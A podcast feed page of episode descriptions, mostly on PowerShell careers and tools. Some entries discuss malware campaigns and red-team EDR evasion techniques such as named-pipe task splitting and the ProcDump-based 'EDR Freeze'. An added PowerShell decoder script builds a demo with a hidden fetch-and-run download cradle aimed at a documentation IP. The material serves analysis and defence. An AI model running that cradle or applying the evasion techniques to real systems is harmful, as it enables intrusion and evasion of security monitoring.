Cross-platform command-line interface and scripting language for system and network administration
On this episode, I go into several stories related to criticism of European Commission regulations, various security related stories, upcoming enhancements for PowerShell and much more! Reference Links: https://www.rorymon.com/blog/criticisms-of-eu-regulations-increase-new-script-library-feature-for-defender-it-nightmare-story/
In this episode of The PowerShell Podcast, Andrew Pla is joined by Tara, a longtime IT professional who has officially started her PowerShell learning journey. Tara shares her honest experience transitioning from a GUI-first mindset to learning PowerShell fundamentals, including objects, verb-noun commands, variables, pipelines, and error messages. The conversation captures the real emotions of learning something new later in a career—confusion, frustration, breakthroughs, and growing confidence. The episode also explores learning strategies like daily practice, flashcards, typing commands instead of copying, and asking “beginner” questions without fear. Andrew and Tara emphasize the importance of community, mentorship, growth mindset, and psychological safety, encouraging listeners that learning PowerShell doesn't require perfection—just consistency, curiosity, and support. Key Takeaways: Learning PowerShell deepens your understanding of IT as a whole, not just scripting, especially through concepts like objects, properties, and methods. Consistency beats intensity — small daily practice, repetition, and typing commands manually build real confidence over time. Community changes everything — asking questions, sharing struggles, and learning publicly makes progress faster and far more enjoyable. Guest Bio: Tara Sinquefield is an experienced IT professional and PDQ team member who is publicly documenting her PowerShell learning journey. Known for her honesty, curiosity, and willingness to ask the questions others may be afraid to ask, Tara represents the many IT pros who are discovering PowerShell later in their careers. Her journey highlights how learning fundamentals can unlock deeper technical understanding, confidence, and new opportunities. 
She is also a host of PDQ Live every week Resource Links: PDQ Discord – https://discord.gg/PDQ Tara's LinkedIn - https://www.linkedin.com/in/tara-sinquefield-894a1a215/ Connect with Andrew - https://andrewpla.tech/links Tara Writes Her First Script: https://www.youtube.com/watch?v=Oa0GYX9_vj8 PowerShell Conference Europe – https://psconf.eu PowerShell + DevOps Global Summit – https://powershellsummit.org The PowerShell Podcast on YouTube: https://youtu.be/ZaPoS4mGW7s
Join Kristian McCann from UC Today and Kevin Kieller from Enable UC as they kick off February 2026 with an in-depth look at Microsoft Teams' latest security enhancements and market momentum. Special guest Oleg Danyliuk, CEO of Duanex, shares his company's five-year journey dual-licensing Slack and Teams—and why Teams is finally winning him over.
This month's topics:
Show Notes
GA: Code apps by Jordan Chodak
Add your Dataverse tables to your Code App by Charles Sexton
We built a Power App with ONE AI Prompt by Charles Sexton and Josh Giles
Power Apps with Liquid Glass by Ryan Johnston
Creating Dynamic Cascading Dropdowns With Related Entities by Megan V. Walker
Reimagine Human and Agent Collaboration with Elaiza Benitez and Claudio Romano
Copy an agent to Copilot Studio
Power Pages Client API (Preview) by Neeraj Nandwana
Embedding WebChat by Adi Leibowit
Check your Power Platform solutions for secrets with Pester and PowerShell by Leo Visser
Breaking down the facts about secure development with Power Platform by Joe Unwin and Justin Tung
Chris Huntingford on Agents and Frontier Firms by Victor Dantas
Import solutions from a pipelines host
The 6 pillars that will define agent readiness in 2026 by Nitasha Chopra
Explaining AI Skills by Scott Hanselman
microsoft/skills
DamoBird365 by Damien Bird
Be sure to subscribe so you don't miss a single episode of Power Platform BOOST!
Thank you for buying us a coffee: buymeacoffee.com
Podcast home page: https://powerplatformboost.com
Email: hello@powerplatformboost.com
Follow us! Twitter: https://twitter.com/powerplatboost Instagram: https://www.instagram.com/powerplatformboost/ LinkedIn: https://www.linkedin.com/company/powerplatboost/ Facebook: https://www.facebook.com/profile.php?id=100090444536122 Mastodon: https://mastodon.social/@powerplatboost
Agents will soon retrieve data from MCP servers and offer formatting options you can interact with. The Copilot "preview pane" opens Word, Excel, and PowerPoint alongside your M365 Chat results. Viva Engage introduces a way to hide your colleagues' messages from your feed. What else landed this week?
0:00 Welcome
1:55 Open Word, Excel, and PowerPoint Files in Microsoft 365 Copilot Chat - MC1225199
4:03 Microsoft Teams: Teams Live Events is retiring - MC1226495
8:17 Enhancing Model Context Protocol (MCP) based agents with rich interactive UI widgets support - MC1227627
14:00 Viva Engage: New option to hide a user's messages - MC1226225
21:11 Drawn electronic signatures with eSignature for Microsoft 365 - MC1225195
24:09 Change meeting organizer via PowerShell cmdlet in Exchange Online - MC1227623
Microsoft MVP Harm Veenstra, creator of PowerShellIsFun.com, joins The PowerShell Podcast to talk about productivity, consistency, and why PowerShell really is fun. Harm shares how blogging regularly helped accelerate his learning, improve his workflow, and deepen his connection to the community. He also discusses his recent transition to macOS, how he uses PowerShell across Mac, Linux, and Windows, and why modern PowerShell is far more cross-platform than many people realize. The conversation dives into VS Code extensions, GitHub Codespaces, WSL, Nerdfonts, and practical terminal setups, along with honest thoughts on AI-generated scripts, learning the hard way, and why asking questions publicly is one of the fastest paths to growth. Key Takeaways: Consistency beats perfection – Having a repeatable workflow for writing, scripting, or learning makes long-term progress almost automatic. PowerShell is truly cross-platform – Running PowerShell on macOS, Linux, WSL, and containers unlocks powerful workflows beyond Windows-only thinking. Community accelerates everything – Asking questions, sharing small discoveries, and contributing publicly leads to faster learning, confidence, and career growth. Guest Bio: Harm Veenstra is a Microsoft MVP, consultant, blogger, and community contributor best known for PowerShellIsFun.com, where he publishes frequent, practical PowerShell content. He is an active participant in the PowerShell community and a regular conference attendee and speaker. 
Resource Links: PowerShell Is Fun – https://powershellisfun.com Connect with Andrew - https://andrewpla.tech/links Install Nerdfonts with PowerShell – https://powershellisfun.com/2026/01/30/install-nerdfonts-using-powershell/ GitHub Codespaces – https://github.com/features/codespaces PowerShell Conference Europe – https://psconf.eu PDQ Discord – https://discord.gg/PDQ Fred's Module Building PS Wednesday – https://www.youtube.com/watch?v=ZAjtbZktL8w The PowerShell Podcast on YouTube: https://youtu.be/V6kWnmrHOms
Recently retired PowerShell icon Don Jones joins The PowerShell Podcast for a wide-ranging conversation on career ownership, community leadership, and building a life that aligns with what you actually value. Don reflects on the difference between your job and your career, why investing in yourself pays off, and how asking better questions can change the way you influence decisions at work. The episode also dives into Don's journey as a fiction author, his role in shaping the PowerShell community and Summit culture, and why real success comes from clarity, kindness, and helping others win. Key Takeaways: • Your employer owns your job, but you own your career—define your destination and build the skills to get there. • Strong careers are built on outcomes, not tools—focus on saving time, reducing errors, and delivering measurable business value. • Community scales when you empower others—create space for people to contribute, own wins, and multiply the impact beyond yourself. Guest Bio: Don Jones is a foundational figure in the PowerShell community, known for his decades of teaching, writing, and advocacy for automation and professional growth. A former Microsoft MVP, Don co-authored the widely influential Learn PowerShell in a Month of Lunches series and helped shape community culture through conferences, mentorship, and leadership. Now retired from full-time work, Don continues writing and publishing fiction, bringing the same clarity and craft to storytelling that made his technical teaching so impactful. 
Resource Links: • Don Jones Website and Books – https://donjones.com Andrew's links: https://andrewpla.tech/links • PowerShell + DevOps Global Summit – https://powershellsummit.org • Tech Impact (nonprofit mentioned) – https://techimpact.org • PowerShell.org – https://powershell.org • PDQ Discord – https://discord.gg/PDQ • PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays The PowerShell Podcast on YouTube: https://youtu.be/xKh8rqCqMQg
After two months of accumulated Qs, we felt we still had plenty of As to dispense, so we're wheeling back around to a supplemental questions episode this week, touching on such topics as generating negative mileage in an EV, what the iOS low battery mode actually does, tiny network racks for your desk, a shocking amount of discussion about shells like zsh, fish, PowerShell and Nushell, the whereabouts of Intel's successor to the Alder Lake-N... and, for that matter, why (nearly) everything at Intel is a Lake.
The Voyager documentary It's Quieter in the Twilight: https://www.youtube.com/watch?v=RIP1p5gAoak
Support the Pod! Contribute to the Tech Pod Patreon and get access to our booming Discord, a monthly bonus episode, your name in the credits, and other great benefits! You can support the show at: https://patreon.com/techpod
Business Process Automation has been around a long time - what are the latest approaches? Richard talks to Ian Cooper about his work building BPA workflows in organizations - starting on paper or a whiteboard to make sense of the process before bringing tools into the equation. Ian talks about building repeatable workflows that are well-documented and source-controlled, typically through GitHub. As workflows get more complex, you'll need orchestration engines that can handle failures and provide telemetry to identify when and where things go wrong. And make sure you let users know how things are going - or they will worry!
Links: Kafka, Durable Functions, GitHub Actions, Temporal, Pulumi, OpenTelemetry
Recorded December 5, 2025
Microsoft Defender is often treated as “good enough” security—built in, always on, and quietly doing its job. But what happens when malware convinces Windows to turn it off without triggering alarms?
In this episode, cybersecurity expert Tyler Mofitt breaks down a real-world Windows malware campaign that disables Defender before anything else happens. No zero-days. No flashy exploits. Just a quiet abuse of built-in trust that causes Windows to set aside its own protection.
He walks through how shortcut files, PowerShell, and legitimate cloud services are used to blend into normal activity, why Defender doesn't fail so much as follow the rules, and what defenders should be watching for when “installed” doesn't always mean “active.”
A conversation about assumptions, visibility, and why the most dangerous attacks don't look dangerous at all.
Link mentioned in the episode - threat intel hub with all the latest trends and stories going on with threat intelligence: https://community.opentextcybersecurity.com/
As featured on Million Podcasts' Best 100 Cybersecurity Podcasts, Top 50 Chief Information Security Officer CISO Podcasts, and Top 70 Security Hacking Podcasts. This list is the most comprehensive ranking of Cyber Security Podcasts online and we are honoured to feature amongst the best! Follow or subscribe to the show on your preferred podcast platform. Share the show with others in the cybersecurity world. Get in touch via reimaginingcyber@gmail.com
Newly minted Microsoft MVP David Sass joins The PowerShell Podcast to talk about PowerShell notebooks, terminal tooling, and making automation approachable for teams that are hesitant to touch the console. David shares how he uses Jupyter/PowerShell notebooks as a practical “click-to-run” interface for colleagues, helping them safely run approved automation while keeping the logic documented, repeatable, and under source control. The conversation also dives into incident response automation, David's journey from SharePoint engineering into security, and the surprising ways PowerShell can be used across Windows, cloud, and even Raspberry Pi lab clusters—while still staying focused on knowledge-sharing and building systems that don't depend on one person.
Key Takeaways:
• Notebooks can remove friction for teams — combining documentation, code, and saved output creates a safer way for others to run automation without needing deep PowerShell confidence.
• PowerShell scales incident response workflows — David explains how notebooks can log in, pull incidents, enrich data, and even auto-close noise, reducing UI-click fatigue for analysts.
• Teaching makes you promotable — sharing knowledge reduces dependency on you, strengthens the team, and makes it easier for a business to grow your role without risk.
Guest Bio: David is a Microsoft MVP and highly skilled SharePoint Guy who is focusing on Automation, Compliance, Security, Operational Excellence, Quality Assurance and hacking the unexpected out from the technology stack.
Resource Links: David's link hub – https://davidsass.io/ Andrew's links - https://andrewpla.tech/links PowerShell Spectre Console – https://pwshspectreconsole.com/ PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays PDQ Discord – https://discord.gg/PDQ ClockworkPi (the handheld device shown/discussed) – https://clockworkpi.com The PowerShell Podcast on YouTube: https://youtu.be/Y03EJYpZczo
Today we are joined by Ben Folland, Security Operations Analyst from Huntress, discussing their work on "ClickFix Gets Creative: Malware Buried in Images." This analysis covers a ClickFix campaign that uses fake human verification checks and a realistic Windows Update screen to trick users into manually running malicious commands. The multi-stage attack chain leverages mshta.exe, PowerShell, and .NET loaders, ultimately delivering infostealers like LummaC2 and Rhadamanthys, with payloads hidden inside PNG images using steganography. While technically sophisticated, the campaign hinges on simple user interaction, underscoring the importance of user awareness and controls around command execution. The research can be found here: ClickFix Gets Creative: Malware Buried in Images Learn more about your ad choices. Visit megaphone.fm/adchoices
In this episode of Technology Tap: CompTIA Study Guide, we explore how proactive detection surpasses reactive troubleshooting in cybersecurity. For those preparing for their CompTIA exam, understanding the subtle clues and quiet anomalies attackers leave behind is essential for developing strong IT skills and excelling in tech exam prep. We dive deep into the critical indicators that help you detect security compromises early, providing practical knowledge essential for your technology education and IT certification journey. Join us as we equip you with expert insights to sharpen your detection abilities and enhance your competence in protecting systems effectively.
We walk through the behaviors that matter: viruses that hitch a ride on clicks, worms that paint the network with unexplained traffic, and fileless attacks that live in memory and borrow admin tools like PowerShell and scheduled tasks. You'll learn how to spot spyware by the aftermath of credential misuse, recognize RATs and backdoors by their steady beaconing to unknown IPs, and use contradictions—like tools disagreeing about running processes—as a signal for rootkits. We also draw a sharp line between ransomware's loud chaos and cryptojacking's quiet drain on your CPU and fan.
Zooming out, we map network and application signals: certificate warnings and duplicate MACs that hint at man-in-the-middle, DNS mismatches that suggest cache poisoning, and log patterns that betray SQL injection, replay abuse, or directory traversal. Along the way, we talk about building Security+ instincts through scaffolding—A+ for OS and hardware intuition, Network+ for protocol fluency, and Security+ for attacker behavior—so indicators make sense the moment you see them.
If you want a sharper eye for subtle threats and a stronger shot at your Security+ exam, this guide will train your attention on the tells adversaries can't fully hide.
Subscribe, share with a teammate who handles triage, and leave a review with your favorite indicator to watch—we'll feature the best ones in a future show.
Support the show
Art by Sarah/Desmond
Music by Joakim Karud
Little Chacha Productions
Juan Rodriguez can be reached at: TikTok @ProfessorJrod, ProfessorJRod@gmail.com, @Prof_JRod, Instagram ProfessorJRod
Matthew Gill joins The PowerShell Podcast to talk about what it means to be a Site Reliability Engineer (SRE) and how SRE thinking changes the way you approach automation, reliability, and problem solving. Matthew and host Andrew Pla break down core concepts like SLAs, SLOs, and SLIs, and why reliability through planning matters more than rushing straight to the keyboard. They also dig into why PSFramework is worth the dependency for enterprise-grade logging and configuration, how community mentorship (including Fred Weinmann's impact) can fast-track growth, and why books like The Phoenix Project are game-changing for understanding DevOps culture and constraints. Key Takeaways: • SRE is software engineering applied to operations — focus on measurable reliability, proper planning, and balancing change with stability using concepts like SLAs, SLOs, and SLIs. • PSFramework can eliminate “reinventing the wheel” — especially for logging and configuration handling, giving enterprises proven patterns and integrations without custom-built fragility. • Community is a career multiplier — mentorship, learning in public, and teaching others are some of the fastest ways to build confidence and advance your PowerShell journey. Guest Bio: Matthew Gill is a Site Reliability Engineer and is the Co-Director of Content for the PowerShell + DevOps Global Summit. He has been a problem solver, systems administrator, and scripter for nearly 20 years. 
From working in the United States Marine Corps, education, radio, and currently the private sector, the majority of Matt's experience has been focused on solving problems in a variety of interesting and creative ways.
Resource Links: PowerShell + DevOps Global Summit – https://powershellsummit.org The Phoenix Project (Book) – https://itrevolution.com/product/the-phoenix-project/ The Unicorn Project (Book) – https://itrevolution.com/product/the-unicorn-project/ PSFramework – https://github.com/PowershellFrameworkCollective/psframework Matthew Gill's Blog – https://therealgill.com Andrew's Links - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays The PowerShell Podcast on YouTube: https://youtu.be/vkOLsjsPvYo
AI tools continue to evolve - what can we do with them today? Richard chats with Cecilia Wirén about her experiences using the latest AI tools to support DevOps workflows, diagnostics, and the crafting of new scripts. Cecilia focuses on tools that can help admins who occasionally work on scripts, including getting into a GitHub workflow to track prompts and results generated by LLMs, so you can always revert and learn from various approaches to interact with these new tools. The tools continue to evolve; it's worth looking at the latest features and models!
Links: Azure SRE Agent, Microsoft Security Copilot, GitHub Copilot, Awesome Copilot, Copilot Extensions
Recorded December 3, 2025
Because… it's episode 0x692!
Shameless plug: 25 and 26 February 2026 - SéQCure 2026 CfP; 31 March to 2 April 2026 - Forum INCYBER - Europe 2026; 14 to 17 April 2026 - Botconf 2026; 28 and 29 April 2026 - Cybereco Cyberconférence 2026; 9 to 17 May 2026 - NorthSec 2026; 3 to 5 June 2026 - SSTIC 2026; 19 September 2026 - Bsides Montréal
Description
Introduction
This second technical podcast episode with Charles F. Hamilton takes an in-depth look at techniques for evading EDR (Endpoint Detection and Response) solutions and the strategies red teamers can use to get around these detection systems. The discussion reveals that, despite technological advances, EDRs remain vulnerable to relatively simple techniques once their detection mechanisms are understood.
The limits of EDR detection
Network correlation and named pipes
A concrete example illustrates the weaknesses of modern EDRs: a malicious executable that communicates with the internet while performing reconnaissance on the internal network. “Top tier” EDRs generally detect this abnormal activity through machine learning, identifying that a process is communicating simultaneously with the outside and with the local network over SMB, Kerberos or other protocols. The workaround is elegant: use Windows named pipes. This native feature allows inter-process communication. By splitting the tasks between two independent processes - one handling external communications, the other the internal reconnaissance - and having them communicate via named pipes, the machine learning detection chain is completely broken. This technique, taught in red team training for 8 years, remains effective.
Signatures in disguise
Paradoxically, despite their claims, EDRs still operate largely on signature principles. The difference from traditional antivirus lies more in where they apply this detection - not only on disk, but also in memory and at the behavioral level. The trade-off between false positives and detection remains delicate: generating 1500 alerts per day would lead to “alert fatigue” and make the system useless.
Obfuscation and evasion techniques
Intelligent randomization
To avoid static detection, obfuscation must be thought through. A common trap: generating random variables of fixed length (for example, always 16 characters). Yara rules can detect this pattern. The solution is to introduce randomness into the random: use variable lengths (between 6 and 22 characters) and concatenate several dictionary words rather than purely random strings.
Memory cleanup
Obfuscation does not stop at execution. Even after decryption in memory, artifacts remain. For example, Cobalt Strike leaves recognizable patterns in the first bytes of the shellcode. The recommended strategy uses several execution threads: one to decrypt and launch the shellcode, another to clean the memory of intermediate variables. Although EDRs do not scan memory continuously (it would be too costly in performance), these artifacts remain detectable.
Kernel-level protection
Protected Process Light (PPL)
Microsoft introduced PPL to protect critical processes such as LSASS. Even with system privileges, an attacker cannot access these processes. The problem: the kernel remains the ultimate point of trust. Once an attacker obtains code execution at the kernel level - via vulnerable drivers, for example - all PPL protections fall.
Anti-tampering techniques
The “EDR Freeze” technique illustrates this reality: using ProcDump (a legitimate Windows tool), a memory dump of an EDR process can be created, which pauses it. By then stopping ProcDump before it finishes, the EDR process remains paused indefinitely, without generating a tampering alert since it has not been modified.
Cloud and new vulnerabilities
Moving to the cloud simply relocates the problems. Traditional attacks targeted the on-premises “domain admin”; today, with multi-factor authentication, attackers use device code phishing or malicious third-party applications to obtain valid OAuth tokens. Once these tokens are obtained, escalation to “global admin” becomes possible. The difficulty: no EDR can monitor these attacks since they take place from the attacker's machine. The only visibility comes from what Microsoft agrees to share, often behind additional paywalls. Companies have spent 20 years mastering Active Directory and on-premises security tools, but are starting from scratch in the cloud with immature tools.
Defensive recommendations
Simple but effective configurations
Several basic measures remain underused:
Block PowerShell for non-technical users
Disable the Run function (Windows+R) for 99% of users
Remove MSHTA.exe via GPO (there is no legitimate need for HTA files)
Restrict Office scripts by default
These measures would eliminate the majority of “commodity malware” attacks, which work only because companies have not closed these basic access vectors.
The irreplaceable human factor
EDRs excel against mass malware but struggle against targeted attacks. AI and agents will not replace human analysts capable of:
Doing active threat hunting
Contextualizing alerts (why would a non-technical user launch PowerShell?)
Detecting anomalies in network traffic (new domains, repetitive POST request patterns)
Telling the complete story of an intrusion by correlating events
Network detection
NDR/XDR are starting to fill this gap, but remain embryonic. Network detection should identify:
New domains never seen before
C2 communication patterns (regular POST requests with jitter)
Authentication anomalies
Unusual traffic for a given user profile
Conclusion
Attacker sophistication remains limited because they do not yet need more - too many environments remain poorly configured. Companies invest heavily in EDRs but neglect basic configurations and the human factor. History repeats itself with the cloud and AI: rather than solving the fundamental problems, responsibility is shifted onto new tools. Real security requires deep technical understanding, rigorous configurations and, above all, competent analysts to interpret the signals and tell the story of incidents.
Collaborators
Nicolas-Loïc Fortin
Charles F. Hamilton
Credits
Editing by Intrasecure inc
Virtual studio by Riverside.fm
Distinguished Software Engineer Ryan Spletzer joins The PowerShell Podcast to talk about building a long-term career in tech through curiosity, continuous learning, and strong community connections. Ryan shares how PowerShell helped shape his path from early work in SharePoint, automation, and identity management to leading AI initiatives at Autodesk, where his team built an internal ChatGPT-style solution using Azure OpenAI before enterprise ChatGPT options existed. They also dig into AI-assisted coding, mentorship, and how foundational software engineering skills still matter more than ever. Ryan offers practical guidance for using AI tools responsibly, overcoming imposter syndrome, and growing by learning adjacent domains like authentication, networking, and data engineering. Key Takeaways: • AI is a force multiplier for experienced engineers, but mentorship is critical to help early-career engineers learn how to ask the right questions and avoid “blind troubleshooting.” • Breadth matters as you level up. Understanding adjacent domains and collaborating well with others becomes a key differentiator at senior and staff levels. • PowerShell remains a career accelerator. Ryan explains how PowerShell led him into infrastructure automation, identity, and modern auth—and why it's still his go-to tool for quick, high-impact scripting today. Guest Bio: Ryan Spletzer is a Distinguished Software Engineer at Autodesk, where he works in an internal organization focused on AI, data, and automation. With a background spanning SharePoint development, .NET engineering, identity systems, and enterprise automation, Ryan has spent years building tools that scale across organizations. He's also a strong advocate for continuous learning and mentorship. 
Resource Links: Ryan links - https://www.spletzer.com/about/ Ryan's blog - https://www.spletzer.com/ Andrew's links - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/playlist?list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/ryZ7OdvCNZo
Jorge Suarez joins The PowerShell Podcast to share his journey into PowerShell, automation, and community contribution. From attending his first MMS conference to building creative and practical PowerShell projects, Jorge talks about how PowerShell became the primary driver of his career growth. The conversation covers his popular Intune Hydration Kit, creative TUI projects inspired by shows like Severance, and how curiosity and experimentation led him to build tools he wished existed earlier in his career. Beyond tooling, Jorge opens up about imposter syndrome, learning in public, and using PowerShell as a force multiplier to automate work, stand out professionally, and think differently about problem solving. Key Takeaways: PowerShell accelerates careers – Automating repetitive work and forcing yourself to use PowerShell daily builds fluency and opens new opportunities. Build what you wish you had – Jorge's projects, including Intune Hydration Kit and multiple TUI tools, came from solving his own real-world problems. Imposter syndrome is fuel – When managed well, it can drive curiosity, learning, and long-term growth instead of holding you back. Guest Bio: Jorge Suarez is an Endpoint Platform Engineer and PowerShell enthusiast. Jorge is known for building creative PowerShell solutions—including terminal user interfaces and Intune automation projects. He's an active community contributor who blogs, shares code on GitHub, and advocates for learning in public. Resource Links: Jorge Suarez on GitHub – https://github.com/jorgeasaurus Jorge's Blog – https://www.jorgeasaur.us/ Intune Hydration Kit – https://github.com/jorgeasaurus/IntuneHydrationKit Connect with Andrew - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays The PowerShell Podcast on YouTube: https://youtu.be/NEDX_3kDhZQ
PowerShell legend Jeff Hicks joins The PowerShell Podcast to talk about what it really means to live in PowerShell every day. From running his entire workflow in the console to building highly polished terminal tools, Jeff shares how PowerShell can be used far beyond infrastructure management—to organize your day, automate personal tasks, and multiply productivity. The conversation also dives deep into learning PowerShell long-term, embracing small wins, investing in your own career growth, and making yourself “available to luck.” Jeff introduces his newest project, PSIntro, designed to help absolute beginners get started with PowerShell through interactive, localized tutorials and a welcoming splash experience. Key Takeaways: PowerShell fluency comes from time and repetition, not talent. Use it daily, even for small personal tasks, and progress will follow. PowerShell is a force multiplier. Thoughtful use of color, terminal UIs, verbose output, and helper functions can dramatically improve productivity. Investing in your own learning outside of work gives you career freedom. Your job is not your career—your skills are. Guest Bio: Jeff Hicks is a PowerShell author, educator, and community icon with nearly two decades of experience teaching automation to IT professionals. A long-time Microsoft MVP, Jeff has written multiple books, created countless tools and modules, and spoken at conferences around the world. Known for his practical approach and passion for teaching, Jeff continues to shape how people learn, use, and think about PowerShell. 
Resource Links: Jeff Links - https://jdhitsolutions.github.io/ PSIntro Project – https://github.com/jdhitsolutions/PSIntro Spectre.Console for PowerShell – https://pwshspectreconsole.com/ PowerShell Summit – https://powershellsummit.org PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/watch?v=ztKT2wK6EW4&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&pp=gAQB The PowerShell Podcast on YouTube: https://youtu.be/lKKfmdDtBOU
In this episode, Todd and Jon discuss the latest AI agreements, updates to the Apple ecosystem (OS 26.2), and the history of PowerShell. The core discussion focuses on the "overcomplication issue" facing tech enthusiasts and offers hardware and software tips to simplify daily workflows. AI & Industry News Disney & OpenAI: The Walt Disney Company has reached an agreement to license characters to OpenAI's Sora. Google Labs: Todd joined the waitlist for "Google Disco," a tool that uses "GenTabs" to create interactive web apps and complete tasks using natural language without coding. Visual Podcasting: Todd discussed using "Nano Banana Pro" and Gemini to create visual whiteboard summaries for podcast notes. Apple OS 26.2 Updates watchOS 26.2: Features updates to Sleep Scores, which Jon notes can feel "judgmental" regarding sleep quality. iPadOS 26.2: Reintroduces multitasking features like slide over and enables "Auto Chapters" for podcasts. macOS 26.2: Introduces "Edge Light" (a virtual ring light for video calls) and "low latency clusters" for local AI development on M5 Macs. Tech History PowerShell Origins: Jeffrey Snover, creator of PowerShell, revealed in a blog post that "cmdlets" were originally named "Function Units" (FUs), reflecting the "Unix smart-ass culture" of the era. Discussion: Simplifying the Tech Stack The hosts discuss the tendency to overcomplicate setups, such as using Docker for RSS feeds or complex SSO for home use. They recommend the following simplifications: Hardware KableCARD: A credit-card-sized kit containing multiple adapters, a light, and a phone stand to replace carrying multiple cables. Presentation Remotes: Use a simple dedicated remote ($20–$30) or repurpose a Surface Pen via Bluetooth instead of relying on complex software solutions. Software Pythonista (iOS/macOS): Run simple local scripts (e.g., GPA calculators) rather than paying for dedicated subscription apps. 
Homebridge: A lighter-weight alternative to Home Assistant for connecting IoT devices (like Sonos) to Apple HomeKit. Troubleshooting Tip Pixel Tablet YouTube Glitch: If the YouTube app on the Pixel Tablet displays unusable, giant thumbnails, the fix is to clear both the app's cache and storage/memory.
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Hunting for SharePoint In-Memory ToolShell Payloads A walk-through showing how to analyze ToolShell payloads, starting with acquiring packets all the way to decoding embedded PowerShell commands. https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Hunting%20for%20SharePoint%20In-Memory%20ToolShell%20Payloads/32524 Android Security Bulletin December 2025 Google fixed numerous vulnerabilities with its December Android update. Two of these vulnerabilities are already being exploited. https://source.android.com/docs/security/bulletin/2025-12-01 4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign A group or individual released several browser extensions that worked fine for years until an update injected malicious code into the extensions. https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign
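The diary above walks from packet capture to decoded PowerShell. As an added example (not the diary's own code), the PowerShell below does the last step on any captured text: it finds powershell.exe/pwsh invocations that carry an -EncodedCommand argument (any prefix of the parameter name, as the real binary accepts), decodes the UTF-16LE base64, reports the other launch flags seen on the same command line, and recurses into the decoded text because loaders frequently nest one encoded command inside another. The request body, the stage-two script and the 203.0.113.x address are constructed for the demo and are not a real ToolShell payload.

```powershell
# Added example: decode -EncodedCommand arguments found in captured text.
# Not the ISC diary's script; the sample capture at the bottom is constructed.

function Find-EncodedPowerShell {
    param(
        [Parameter(Mandatory)][string]$Text,
        [int]$Depth    = 0,
        [int]$MaxDepth = 4     # stop walking pathological nesting
    )
    # powershell/pwsh ... -e | -ec | -enc | -encoded | -encodedcommand <base64>
    # The lazy [^\r\n]*? keeps the match on one command line.
    $pattern = '(?i)(?:powershell|pwsh)(?:\.exe)?[^\r\n]*?\s-e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{16,})'
    $flagPattern = '(?i)\s-(?:nop\w*|noni\w*|w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass)'

    foreach ($m in [regex]::Matches($Text, $pattern)) {
        $b64 = $m.Groups[1].Value
        # -EncodedCommand is base64 over the UTF-16LE bytes of the script text
        try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64)) }
        catch { $decoded = "<base64 decode failed: $($_.Exception.Message)>" }

        [pscustomobject]@{
            Depth   = $Depth
            Offset  = $m.Index
            Flags   = ([regex]::Matches($m.Value, $flagPattern) | ForEach-Object { $_.Value.Trim() }) -join ' '
            Decoded = $decoded
        }
        # Recurse: the decoded script may itself launch another encoded command
        if ($Depth -lt $MaxDepth) {
            Find-EncodedPowerShell -Text $decoded -Depth ($Depth + 1) -MaxDepth $MaxDepth
        }
    }
}

# --- demo on a constructed capture (two layers of encoding, built here on purpose) ---
$stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.42/s2.ps1')"
$inner  = 'powershell -nop -w hidden -enc ' +
          [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))
$outer  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$body   = "POST /example/upload.aspx HTTP/1.1`r`n`r`ncmd=cmd.exe /c powershell.exe -ep bypass -EncodedCommand $outer"

Find-EncodedPowerShell -Text $body | Format-List
# Depth 0 shows "-ep bypass" and decodes to the $inner command line;
# Depth 1 shows "-nop -w hidden" and decodes to the download cradle in $stage2.
```

Feed it the reassembled HTTP body from your capture (or a file read with Get-Content -Raw); the Offset column lets you jump back to the spot in the original bytes.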
Newly minted Microsoft MVP, pentester, and returning guest Spencer Alessi joins The PowerShell Podcast to talk about growth, giving back, and building security through PowerShell. Spencer shares lessons from his journey from sysadmin to pen tester, including the importance of learning from mistakes, documenting wins, and advocating for yourself in your career. He also introduces his latest open-source project, AppLocker Inspector, and discusses tools like Locksmith, Ping Castle, and Purple Knight that help IT pros secure their environments and build confidence in automation and defense. Key Takeaways: Grow through mistakes – Learn from both your own missteps and those of others; every lesson strengthens your technical and professional skills. Security tools for sysadmins – Free PowerShell-based tools like AppLocker Inspector, Locksmith, and Purple Knight offer practical wins for securing Active Directory. Advocate for yourself and give back – Track your wins, share your work, and pay forward the mentorship and generosity that helped you grow. Guest Bio: Spencer Alessi is a Microsoft MVP, penetration tester, and community educator passionate about helping sysadmins strengthen their environments. Known online as @TechSpence, he creates approachable content and tools focused on helping sysadmins to improve security. Spencer is also a podcast host, public speaker, and strong advocate for mentorship, authenticity, and continuous learning in tech.
